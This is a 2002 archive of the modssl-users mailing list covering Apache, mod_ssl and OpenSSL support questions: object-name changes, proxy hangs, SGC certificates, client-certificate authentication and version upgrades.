
From owner-modssl-users@modssl.org  Tue May 28 22:00:11 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id VAA06223; Tue, 28 May 2002 21:59:34 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from serv01.aet.tu-cottbus.de id VAA06186; Tue, 28 May 2002 21:58:58 +0200 (MET DST)
Received: from localhost (localhost [127.0.0.1])
	by serv01.aet.tu-cottbus.de (Postfix) with ESMTP
	id D40252D16; Tue, 28 May 2002 21:58:56 +0200 (METDST)
Received: by serv01.aet.tu-cottbus.de (Postfix, from userid 11019)
	id 70E8C2CAF; Tue, 28 May 2002 21:58:54 +0200 (METDST)
Date: Tue, 28 May 2002 21:58:54 +0200
From: Lutz Jaenicke 
To: openssl-dev@openssl.org
Cc: modssl-users@modssl.org
Subject: Re: NID_uniqueIdentifier got (partially) lost?
Message-ID: <20020528195854.GA23471@serv01.aet.tu-cottbus.de>
Mail-Followup-To: openssl-dev@openssl.org, modssl-users@modssl.org
References: <20020528180808.A66725@deejai2.mch.fsc.net>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
In-Reply-To: <20020528180808.A66725@deejai2.mch.fsc.net>
User-Agent: Mutt/1.3.99i
Organization: BTU Cottbus, Allgemeine Elektrotechnik
X-Virus-Scanned: by AMaViS snapshot-20011031
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Lutz Jaenicke 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

On Tue, May 28, 2002 at 06:08:08PM +0200, Martin Kraemer wrote:
> When trying to compile apache+mod_ssl against a recent snapshot of
> openssl-0.9.8-dev (?), I get compile errors because the #define for
>   NID_uniqueIdentifier
> is no longer present. It used to be both in objects.h and in obj_mac.h
> (and is referenced in ssl_engine_vars.c): 
>  cscope:
>  0 ssl_engine_vars.c   410 { "UID", NID_uniqueIdentifier },
>  1 objects.h           557 #define NID_uniqueIdentifier 102
>  2 obj_mac.h          1550 #define NID_uniqueIdentifier 102
> 
> Now the funny thing is that the variable is still present in an up-to-date
> copy of objects.h, but it has vanished from obj_mac.h (but USE_OBJ_MAC
> is set so it is only #included freom the latter).

The contents of objects.h is no longer being used. Only obj_mac.h is
important now.

> It appears that a renaming has happened, as the string "UID" is still
> present in both include files, albeit with a different definition:
> ---obj_mac.h:---
> #define SN_userId               "UID"
> #define LN_userId               "userId"
> #define NID_userId              458
> #define OBJ_userId              OBJ_pilotAttributeType,1L
> ---objects.h:---
> #define SN_uniqueIdentifier             "UID"
> #define LN_uniqueIdentifier             "uniqueIdentifier"
> #define NID_uniqueIdentifier            102
> #define OBJ_uniqueIdentifier            OBJ_X509,45L

Yes. The previous usage of the shortname UID was wrong, it has been
corrected. Now it is correctly being used for "userId"
The name uniqueIdentifier has been corrected to x500uniqueIdentifier
according to RFC2256. Please check out the thread
 wrong defines SN_xyz
being discussed around April 02 -- April 10 on openssl-dev and other
threads short thereafter.

(This does not help with your mod_ssl problem, as it requires an
adjustment of mod_ssl, though.)

Best regards,
	Lutz
-- 
Lutz Jaenicke                             Lutz.Jaenicke@aet.TU-Cottbus.DE
http://www.aet.TU-Cottbus.DE/personen/jaenicke/
BTU Cottbus, Allgemeine Elektrotechnik
Universitaetsplatz 3-4, D-03044 Cottbus
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed May 29 08:48:15 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id IAA21170; Wed, 29 May 2002 08:47:22 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from visp.engelschall.com id IAA21122; Wed, 29 May 2002 08:46:59 +0200 (MET DST)
Received: by visp.engelschall.com (Postfix, from userid 1005)
	id 35AFB4CE764; Wed, 29 May 2002 08:46:58 +0200 (CEST)
Received: by en1.engelschall.com (Postfix, from userid 10000)
	id EC9AA2870B; Wed, 29 May 2002 07:08:56 +0200 (CEST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from mail.efinnet.com id XAA11048; Tue, 28 May 2002 23:28:31 +0200 (MET DST)
Received: from ameritech.net (IDENT:tgagne@tgagne.int.efinnet.com [192.168.1.133])
	by mail.efinnet.com (8.11.3/8.11.5) with ESMTP id g4SLWf531746
	for ; Tue, 28 May 2002 17:32:41 -0400
Message-ID: <3CF3F689.B8630910@ameritech.net>
Date: Tue, 28 May 2002 17:28:41 -0400
From: Thomas =?iso-8859-1?Q?Gagn=E9?= 
Organization: eFinNet, Corp.
X-Mailer: Mozilla 4.77 [en] (X11; U; Linux 2.2.14-5.0 i686)
X-Accept-Language: en
MIME-Version: 1.0
To: modssl-users@modssl.org
Subject: [2.0.36] Last message: Seeding PRNG with 136 bytes of entropy
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Thomas =?iso-8859-1?Q?Gagn=E9?= 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

./configure --enable-ssl --enable-proxy

First, I'm reverse-proxying another box.  When I do
everything using just HTTP, it all works.

Requests from the browser (IE 5) coming-in HTTPS using a
home-made
certificate (openssl, CA.pl -newcert).  Everything works
fine for a while.  Then, for no good reason the server
writes
in the ssl_engine_log:

[datetime 31272] [info]  Connection to child 7 established
(servername:443, client 10.0.0.52)
[datetime 31272] [info]  Seeding PRNG with 136 bytes of
entropy

and the browser hangs.

After I close the browser and login again, I start seeing a
bunch of
[datetime 31257] [warn]  Failed to acquire global mutex lock

[datetime 31257] [warn]  Failed to release global mutex lock

I have to recycle the apache proxy server to clear its
head.  Where should I look to find out what the problem is?

I've got it configured so that it's reverse-proxying
everything from DocumentRoot.

Like I said, everything works fine until it hangs (isn't
that always the case).

--
.tom
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed May 29 09:06:02 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id JAA22650; Wed, 29 May 2002 09:05:11 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from darkstar.sysinfo.com id JAA22387; Wed, 29 May 2002 09:04:03 +0200 (MET DST)
Received: from localhost (dufresne@localhost)
	by darkstar.sysinfo.com (8.9.1/8.9.1) with ESMTP id DAA13677
	for ; Wed, 29 May 2002 03:04:20 -0400
Date: Wed, 29 May 2002 03:04:20 -0400 (EDT)
From: "R. DuFresne" 
To: modssl-users@modssl.org
Subject: RE: OT: Encryption and Credit Card Processing (fwd)
Message-ID: 
Organization: sysinfo.com
X-Subliminal: If at first you don't suck seed...
X-Admonition: The Good thing about potential is
X-Admonition2: as long as you do nothing
X-Admonition3: you'll always have it.
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "R. DuFresne" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users



Can others with more incite to verisign certs verify this information for
me?  thanks in advance:


In response to your question (see below) about surrogate/gated 
functionality built into the major browsers since Netscape and IE version 
3, the answer is simple.  To address the global needs of the US financial 
community, the US Government agreed to this functionality for both domestic 
and exportable versions of the browser.  The Federal Government agreed to 
this provided the server that triggers the higher strength processing is 
operating in the US or Canada and a domestic commercial certificate 
authority (CA) with the capability of issuing such certificates is 
utilized. To my knowledge, only VeriSign can provide such certificates.  I 
have been involved with the installation of global certificates on 
Netscape, iPlanet, and IIS web servers since at least the first quarter of 
the Year 2000.  Initially, WebLogic servers could not handle global 
certificates even though BEA claimed its software did.  Once BEA completed 
its legal agreement with VeriSign, the issue was supposedly 
resolved.  While I expect that this is true, I have never validated it for 
myself.  I don't recall that an Apache web server could handle the Global 
certificates.  To function properly, the supplier of the web server must 
obtain special (export controlled) code from the issuing CA.

Note: I'm note exposing any secrets here.  You should be able to obtain 
this information freely from the VeriSign, Netscape, and Microsoft public 
web sites.  You just may have to dig for it awhile.


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed May 29 16:58:08 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id QAA18721; Wed, 29 May 2002 16:57:13 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from falla.videotron.net id QAA18690; Wed, 29 May 2002 16:56:29 +0200 (MET DST)
Received: from betty.localnet ([24.202.164.28])
 by falla.videotron.net (Sun Internet Mail Server sims.3.5.1999.12.14.10.29.p8)
 with ESMTP id <0GWV0028LO5RTS@falla.videotron.net> for modssl-users@modssl.org; Wed, 29 May 2002 10:56:16 -0400 (EDT)
Received: from localhost ([127.0.0.1] ident=geoff) by betty.localnet with esmtp (Exim 3.35 #1 (Debian))
 id 17D4s3-00008S-00; Wed, 29 May 2002 10:56:15 -0400
Date: Wed, 29 May 2002 10:56:15 -0400 (EDT)
From: Geoff Thorpe 
Subject: RE: OT: Encryption and Credit Card Processing (fwd)
In-reply-to: 
To: modssl-users@modssl.org
Message-id: 
MIME-version: 1.0
Content-type: TEXT/PLAIN; charset=US-ASCII
X-X-Sender: geoff@betty.localnet
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Geoff Thorpe 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Hi there,

On Wed, 29 May 2002, R. DuFresne wrote:

> Can others with more incite to verisign certs verify this information for
> me?  thanks in advance:

Dunno about the insightful, but I'll try instead ...

> In response to your question (see below) about surrogate/gated
> functionality built into the major browsers since Netscape and IE version
> 3, the answer is simple.  To address the global needs of the US financial
> community, the US Government agreed to this functionality for both domestic
> and exportable versions of the browser.  The Federal Government agreed to
> this provided the server that triggers the higher strength processing is
> operating in the US or Canada and a domestic commercial certificate
> authority (CA) with the capability of issuing such certificates is
> utilized. To my knowledge, only VeriSign can provide such certificates.  I
> have been involved with the installation of global certificates on
> Netscape, iPlanet, and IIS web servers since at least the first quarter of
> the Year 2000.  Initially, WebLogic servers could not handle global
> certificates even though BEA claimed its software did.  Once BEA completed
> its legal agreement with VeriSign, the issue was supposedly
> resolved.  While I expect that this is true, I have never validated it for
> myself.  I don't recall that an Apache web server could handle the Global
> certificates.  To function properly, the supplier of the web server must
> obtain special (export controlled) code from the issuing CA.

Apache-based servers can handle this - it requires a sufficient version of
OpenSSL, it has very little to do with apache nor even the ssl module (it
should make no difference between apache-ssl and mod_ssl, for example).
IIRC, configuration is a problem - because these SGC (Server Gated Crypto)
usually consist of a cert chain with an intermediate CA cert that is
unknown to browsers (it is in turn signed by a CA cert that *is* known to
browsers). So, you need to ensure the intermediate cert is also in the
server cert file (or was it the CA list? I forget ...)

One of the problems was that these certificates were being issued with one
or both of a "netscape" cert extension and a "microsoft" cert extension.
If your signed cert didn't contain the microsoft one, then you'd be fine
no matter which version of openssl you were running - in short, without
the microsoft extension present in the cert, even IE browsers would obey
the SSL protocol. With the microsoft extension present however, IE would
enter some deranged brain-state in which it thought it could simply make
up it's own new twist on the SSL protocol. This confused various servers
except IIS until everyone figured out what was going on with Microsoft's
creative side and developed workarounds for it - hence the point about
having a "sufficient" version of OpenSSL. All recent releases of OpenSSL
are OK and can cope with these brain-damaged SSL renegotiate hacks from
IE.

Whether you get a microsoft extension in your SGC cert or not probably
depends on the competency, care, and mood of Verisign - and as with all
things involving either microsoft and/or verisign, you probably need an
agreeable alignment of the planets too. IIRC, people running apache based
servers were being issued with SGC certs some of which contained the
microsoft extension and some of which didn't. Also, the intermediate
signing certificate varied quite frequently, so it wasn't possible to
hard-code a fixed set of intermediate certs as "trusted" - it was usually
necessary to treat the intermediate cert as part of the server-cert-chain.

But this is all rather moot, see below ...

> Note: I'm note exposing any secrets here.  You should be able to obtain
> this information freely from the VeriSign, Netscape, and Microsoft public
> web sites.  You just may have to dig for it awhile.

SGC certs are no longer required. It was only ever an issue for
export-crippled browsers anyway and those simply don't (or shouldn't)
exist any more. SGC also cost heaps more. Get a "normal" cert.

Cheers,
Geoff

-- 
Geoff Thorpe, geoff(at)geoffthorpe(dot)net

2000 years on, it's a different empire but the same
zealots and the same attrocities.


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed May 29 19:03:08 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id TAA27673; Wed, 29 May 2002 19:02:21 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from visp.engelschall.com id TAA27607; Wed, 29 May 2002 19:01:10 +0200 (MET DST)
Received: by visp.engelschall.com (Postfix, from userid 1005)
	id E9CEE4CE763; Wed, 29 May 2002 19:01:08 +0200 (CEST)
Received: by en1.engelschall.com (Postfix, from userid 10000)
	id E58A128704; Wed, 29 May 2002 17:16:51 +0200 (CEST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via SMTP for 
	from cctinet.concatel.com id RAA19735; Wed, 29 May 2002 17:07:25 +0200 (MET DST)
From: gilad.buzi@bcn.concatel.com
Received: (qmail 12652 invoked from network); 29 May 2002 15:07:24 -0000
Received: from unknown (HELO cctnotes.bcn.concatel.com) (192.168.1.249)
  by cctinet.concatel.com with SMTP; 29 May 2002 15:07:24 -0000
Subject: windows and apache 2.0.36
To: modssl-users@modssl.org
X-Mailer: Lotus Notes Version 5.0.2c (Esp.) 8 febrero del 2000
Message-ID: 
Date: Wed, 29 May 2002 17:04:16 +0200
X-MIMETrack: Serialize by Router on cctnotes/CONCATEL(Release 5.0.4 |June 8, 2000) at 29/05/2002
 17:04:15
MIME-Version: 1.0
Content-type: text/plain; charset=iso-8859-1
Content-Transfer-Encoding: 8bit
X-MIME-Autoconverted: from quoted-printable to 8bit by opensource.ee.ethz.ch id RAA19846
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: gilad.buzi@bcn.concatel.com
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

does anyone know if there is a compiled version of mod_ssl for windows
(mod_ssl.so) anywhere?
one of my customers (believe me, i wouldn't do it) wants to install https
with apache 2.x under windows.

thanks,
                                    
 Gilad Buzi                         
 R&D Engineer · CONCATEL            
                                    
                                    
 gilad.buzi@bcn.concatel.com        
 c/Sardenya, 229-237 Atic. 2a ·     
 08013 Barcelona Spain              
 tel. +34.93.244.88.77 · fax        
 +34.93.244.88.78                   
                                    
          www.concatel.com          
                                    


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed May 29 20:16:05 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id UAA03200; Wed, 29 May 2002 20:14:17 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from mel-rto6.wanadoo.fr id UAA03175; Wed, 29 May 2002 20:13:38 +0200 (MET DST)
Received: from mel-rta7.wanadoo.fr (193.252.19.61) by mel-rto6.wanadoo.fr (6.5.007)
        id 3CF4A08C00064443 for modssl-users@modssl.org; Wed, 29 May 2002 20:13:31 +0200
Received: from fdesar (80.14.237.42) by mel-rta7.wanadoo.fr (6.5.007)
        id 3CEE0FF4002E9B35 for modssl-users@modssl.org; Wed, 29 May 2002 20:13:31 +0200
Date: Wed, 29 May 2002 20:13:30 +0200
From: François Désarménien 
To: modssl-users@modssl.org
Subject: External certificate validation
Message-Id: <20020529201330.43ae0736.francois@fdesar.net>
X-Mailer: Sylpheed version 0.6.4 (GTK+ 1.2.10; i686-pc-linux-gnu)
Mime-Version: 1.0
Content-Type: text/plain; charset=ISO-8859-1
Content-Transfer-Encoding: 8bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: François Désarménien 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Hello, everybody.

I've been searching the web and read the Documentations, FAQS,
HOWTOs READMEs for a while with no luck, that's why I'm posting
here.

I need to be able not to store root CA certificates and CRLs
on the web server, but to rather use a dedicated OCSP server
of some sort to validate clients certificates.

Is there a way (or hook) I could use to achieve this ?

Thank you for your time,

François 
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu May 30 04:33:04 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id EAA29890; Thu, 30 May 2002 04:32:09 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from pluto.trimble.co.nz id EAA29882; Thu, 30 May 2002 04:31:56 +0200 (MET DST)
Received: (qmail 31711 invoked from network); 30 May 2002 14:31:53 +1200
Received: from venus.trimble.co.nz (155.63.248.20)
  by pluto.trimble.co.nz with DES-CBC3-SHA encrypted SMTP; 30 May 2002 14:31:53 +1200
Received: (qmail 7923 invoked by uid 403); 30 May 2002 14:31:53 +1200
Received: from jhaar@trimble.co.nz by venus.trimble.co.nz by uid 400 with qmail-scanner-1.12 (trophie: 5.500-0829/275/46514. sophie: 2.10/3.57. spamassassin: 2.x. . Clear:. Processed in 0.799698 secs); 30 May 2002 02:31:53 -0000
Received: from crom.trimble.co.nz (155.63.248.198)
  by venus.trimble.co.nz with SMTP; 30 May 2002 14:31:51 +1200
Received: (qmail 12307 invoked by uid 500); 30 May 2002 02:31:51 -0000
Date: Thu, 30 May 2002 14:31:51 +1200
From: Jason Haar 
To: modssl-users@modssl.org
Subject: Workaround for bug with FakeBasicAuth
Message-ID: <20020530023151.GB7962@trimble.co.nz>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
User-Agent: Mutt/1.3.99i
Organization: Trimble Navigation New Zealand Ltd.
X-Spam-Rating: pluto.trimble.co.nz 1.6.3-jlh 0/2001/A
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Jason Haar 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

I've been trying to get Client cert authentication to work with mod_ssl
2.8.4-8 and have everything working bar directory listings. Apparently this
is a bug that goes back over a year now?

Anyway, I think I have a workaround.

Instead of using FakeBasicAuth, I instead use SSLRequire, and change
CustomLog to "fake" the auth entry:

i.e.

LogFormat "%h %l %u %t \"%r\" ....." standard
LogFormat "%h %l SSL:%{SSL_CLIENT_S_DN_EMAIL}e %t \"%r\" ..." ssl-standard

CustomLog /log/access_log standard
#Override the CustomLog setting for valid SSL Client Certs
CustomLog /log/access_log ssl-standard env=SSL_CLIENT_S_DN_EMAIL


 SSLRequireSSL
 SSLVerifyClient require
 SSLVerifyDepth  1
 SSLOptions +StrictRequire +ExportCertData +CompatEnvVars +StdEnvVars
 SSLBanCipher NULL-MD5 NULL-SHA
 SSLRequire           %{SSL_CLIENT_S_DN_OU}  in {"our dep"}
 Options none Indexes FollowSymlinks SymLinksIfOwnerMatch
 AllowOverride None
 order allow,deny
 allow from all
    

The only concern I have is that I had to set +StdEnvVars in order to get
SSL_CLIENT_S_DN_EMAIL into the environment. Can I access that some other
way, or is the extra load of adding the env vars not bad enough to be
concerned about?

Also, if anyone thinks that's not going to operate the way I think it should
(i.e. only allow OU="our dep" access) please let me know :-)

Thanks

-- 
Cheers

Jason Haar

Information Security Manager
Trimble Navigation Ltd.
Phone: +64 3 9635 377 Fax: +64 3 9635 417
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu May 30 10:25:14 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id KAA18407; Thu, 30 May 2002 10:24:10 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from visp.engelschall.com id KAA18357; Thu, 30 May 2002 10:23:32 +0200 (MET DST)
Received: by visp.engelschall.com (Postfix, from userid 1005)
	id D26C74CE74C; Thu, 30 May 2002 10:23:30 +0200 (CEST)
Received: by en1.engelschall.com (Postfix, from userid 10000)
	id 828CE28ADB; Thu, 30 May 2002 10:23:23 +0200 (CEST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from localhost id XAA15363; Wed, 29 May 2002 23:17:06 +0200 (MET DST)
Date: Wed, 29 May 2002 23:17:06 +0200 (MET DST)
Message-Id: <200205292117.XAA15363@opensource.ee.ethz.ch>
From: modssl-bugdb@modssl.org
To: modssl-users@modssl.org
Subject: [BugDB] "require" field via FakeBasicAuth broken on indexes (PR#708)
Cc: modssl-bugdb@modssl.org
X-Loop: modssl-bugdb@modssl.org
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: modssl-bugdb@modssl.org
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Full_Name: Jason Haar
Version: 2.8.4 through 2.8.8
OS: Linux
Submission from: (NULL) (203.96.111.202)


I've got SSL certs and FakeBasicAuth 99.9% working well.

e.g.

With a valid client cert and that DN put into a DB file, I can view
https://domain/dir/test.php, and I've written that to show me SSL_CLIENT_CN,etc
- all fine

If I remove that DN from the DB file, then I get access denied - all fine

If I revoke the cert I get "your cert has been revoked" (except under IE that
reports "the server cert has been revoked - this site should not be trusted" -
GAHHH!! I think that's an IE bug - Mozilla does it right.

However, that's an aside. 

If I have a valid cert and can view https://domain/dir/test.php correctly, then
try to go to https://domain/dir/, I get "access denied". 

If I remove the "require valid-user" line, https://domain/dir/ starts
working...

No error of any description is reported in error_log of ssl_engine_log, but
access_log shows the 403.

It looks like there's an ordering problem there somewhere. I've whacked in
"Options All","AllowOverride All" to no avail. That dir works fine under http
and https as long as there's no require statement.

Any ideas?

Thanks

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu May 30 16:02:04 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id QAA12011; Thu, 30 May 2002 16:01:17 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from theorem.co.uk id QAA11974; Thu, 30 May 2002 16:00:47 +0200 (MET DST)
Received: from theorem.co.uk (tscsp16 [192.168.1.14])
	by theorem.co.uk (8.9.1b+Sun/8.9.1) with ESMTP id OAA08968
	for ; Thu, 30 May 2002 14:57:09 +0100 (BST)
Message-ID: <3CF62FB4.A3958358@theorem.co.uk>
Date: Thu, 30 May 2002 14:57:08 +0100
From: Mark Stowe 
Organization: Theorem Solutions Ltd
X-Mailer: Mozilla 4.5 [en] (X11; I; SunOS 5.7 sun4u)
X-Accept-Language: en
MIME-Version: 1.0
To: "modssl-users@modssl.org" 
Subject: Internet Explorer 5.5
Content-Type: multipart/alternative;
 boundary="------------FED52565950F16B66E4AE3EC"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Mark Stowe 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users


--------------FED52565950F16B66E4AE3EC
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit

Hi,

I have the following installation of apache with mod-ssl:

apache 1.3.12
mod-ssl 2.6 for apache 1.3.12
openssl 0.9.5
zlib 1.1.3

Does anyone know why Internet Explorer 5.5 will NOT connect to secure
pages on a web site built with the above components.
We have had no problems on any other browers.

e.g. Explorer up to and including v5.0
        All Netscape releases.

Any help/pointers will be appreciated

--

regards

Mark Stowe



--------------FED52565950F16B66E4AE3EC
Content-Type: text/html; charset=us-ascii
Content-Transfer-Encoding: 7bit



Hi,

I have the following installation of apache with mod-ssl:

apache 1.3.12

mod-ssl 2.6 for apache 1.3.12

openssl 0.9.5

zlib 1.1.3

Does anyone know why Internet Explorer 5.5 will NOT connect to secure
pages on a web site built with the above components.

We have had no problems on any other browers.

e.g. Explorer up to and including v5.0

        All Netscape releases.

Any help/pointers will be appreciated

-- 

regards

Mark Stowe


 

--------------FED52565950F16B66E4AE3EC--

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu May 30 19:57:17 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id TAA00059; Thu, 30 May 2002 19:56:21 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from dragon.goamerica.net id TAA00025; Thu, 30 May 2002 19:55:33 +0200 (MET DST)
Received: by hunter.goamerica.net with Internet Mail Service (5.5.2653.19)
	id <2F00L33T>; Thu, 30 May 2002 13:50:40 -0400
Message-ID: <304CFC651EDCD4118AA800D0B774AFB36F4A2D@hunter.goamerica.net>
From: Shon Stephens 
To: "'modssl-users@modssl.org'" 
Subject: version compatibility
Date: Thu, 30 May 2002 13:50:32 -0400
MIME-Version: 1.0
X-Mailer: Internet Mail Service (5.5.2653.19)
Content-Type: text/plain;
	charset="iso-8859-1"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Shon Stephens 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

i am currently using modssl 2.8.4 w/ apache 1.3.20 and openssl 0.9.6b. for
compatibility with another application, i need to upgrade my openssl to
0.9.6c. will i have any problems with the modssl/apache upgrading to this
version of openssl. in other words, will i need to upgrade my modssl
version? should i recompile modssl with the new openssl version, or can i
just replace what is currently there?

thanks,
shon

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu May 30 21:31:05 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id VAA05813; Thu, 30 May 2002 21:30:22 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from serv01.aet.tu-cottbus.de id VAA05761; Thu, 30 May 2002 21:29:35 +0200 (MET DST)
Received: from localhost (localhost [127.0.0.1])
	by serv01.aet.tu-cottbus.de (Postfix) with ESMTP id 4B0C22D11
	for ; Thu, 30 May 2002 21:29:34 +0200 (METDST)
Received: by serv01.aet.tu-cottbus.de (Postfix, from userid 11019)
	id 95ED62D15; Thu, 30 May 2002 21:29:31 +0200 (METDST)
Date: Thu, 30 May 2002 21:29:31 +0200
From: Lutz Jaenicke 
To: "'modssl-users@modssl.org'" 
Subject: Re: version compatibility
Message-ID: <20020530192931.GB25291@serv01.aet.tu-cottbus.de>
Mail-Followup-To: "'modssl-users@modssl.org'" 
References: <304CFC651EDCD4118AA800D0B774AFB36F4A2D@hunter.goamerica.net>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
In-Reply-To: <304CFC651EDCD4118AA800D0B774AFB36F4A2D@hunter.goamerica.net>
User-Agent: Mutt/1.3.99i
Organization: BTU Cottbus, Allgemeine Elektrotechnik
X-Virus-Scanned: by AMaViS snapshot-20011031
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Lutz Jaenicke 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

On Thu, May 30, 2002 at 01:50:32PM -0400, Shon Stephens wrote:
> i am currently using modssl 2.8.4 w/ apache 1.3.20 and openssl 0.9.6b. for
> compatibility with another application, i need to upgrade my openssl to
> 0.9.6c. will i have any problems with the modssl/apache upgrading to this
> version of openssl. in other words, will i need to upgrade my modssl
> version? should i recompile modssl with the new openssl version, or can i
> just replace what is currently there?

Source code compatibility should not be an issue. Binary compatibility
is possible, but I don't know for sure, whether some internal interface was
changed. I would thus recommend to recompile.

Best regards,
	Lutz
-- 
Lutz Jaenicke                             Lutz.Jaenicke@aet.TU-Cottbus.DE
http://www.aet.TU-Cottbus.DE/personen/jaenicke/
BTU Cottbus, Allgemeine Elektrotechnik
Universitaetsplatz 3-4, D-03044 Cottbus
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri May 31 00:05:15 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id AAA14145; Fri, 31 May 2002 00:04:40 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from ivivos.com id AAA14080; Fri, 31 May 2002 00:03:23 +0200 (MET DST)
Received: from elusion [66.57.168.62] by ivivos.com with ESMTP
  (SMTPD32-7.07) id A1E016B0080; Thu, 30 May 2002 18:04:16 -0400
From: "Chris Hsiang" 
To: 
Subject: PassPhraseDialog BuiltIn not supported...
